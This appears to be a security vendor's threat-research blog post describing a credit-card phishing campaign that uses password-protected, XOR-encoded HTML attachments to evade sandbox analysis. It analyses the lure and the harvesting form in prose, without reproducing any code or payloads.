Recently, Proofpoint researchers have observed a number of email campaigns with attached password-protected malicious documents. These documents are primarily used to distribute malware including Cerber ransomware and the Ursnif banking Trojan, with document passwords included in the body of the email. The use of password-protected documents makes them difficult to execute in automated sandbox environments, circumventing a variety of anti-malware products. At the same time, including the password in the email makes it easy for recipients to open the document while password protection adds a sense of legitimacy.
Last week, however, we observed a phishing campaign using this technique designed to harvest credit card account numbers and personal information from account holders.
The email sample that we analyzed was personalized with the recipient’s name and what appear to be the starting digits of their credit card account number. The starting digits for credit cards are standardized, though, so this just adds to the apparent legitimacy of the carefully crafted emails without requiring actual knowledge of the recipient’s’ card number. The emails also use stolen branding and social engineering to create a sense of urgency encouraging the recipient to update security information for their “new chip card” (Figure 1).
Figure 1: Personalized phishing email with HTML attachment
The email includes an HTML attachment that is protected by a password included in the email. The HTML attachment is also XOR-encoded, again making dynamic analysis more difficult. The encoded email is shown in Figure 2:
Figure 2: XOR-encoded HTML file attached to lure email (split for screen wrap)
Figure 4: Password prompt generated when the recipient opens the attached HTML file
If the user enters the password correctly, they will be presented with a fairly typical credit card phishing template, complete with stolen branding (redacted – Figure 5):
Figure 5: HTML phishing template after successful decoding (split for screen wrap)
The form will submit the credentials in the same manner as we see in typical credential phishing, via HTTP POST.
Figure 6: Code snippet from HTML file featuring POST method for submitting phished information
Credential and credit card phishing are nearly as old as cybercrime itself. This hasn’t stopped phishing actors from innovating, exploring new approaches to convincing users to divulge personal, banking, and financial information. In this case, we observed threat actors taking a cue from malware distributors, using password protected document attachments to bypass anti-malware technologies and give recipients a false sense of security. The bottom line for end users though is that the appearance of legitimacy, even including personalization and convincing branding, does not equal safety online.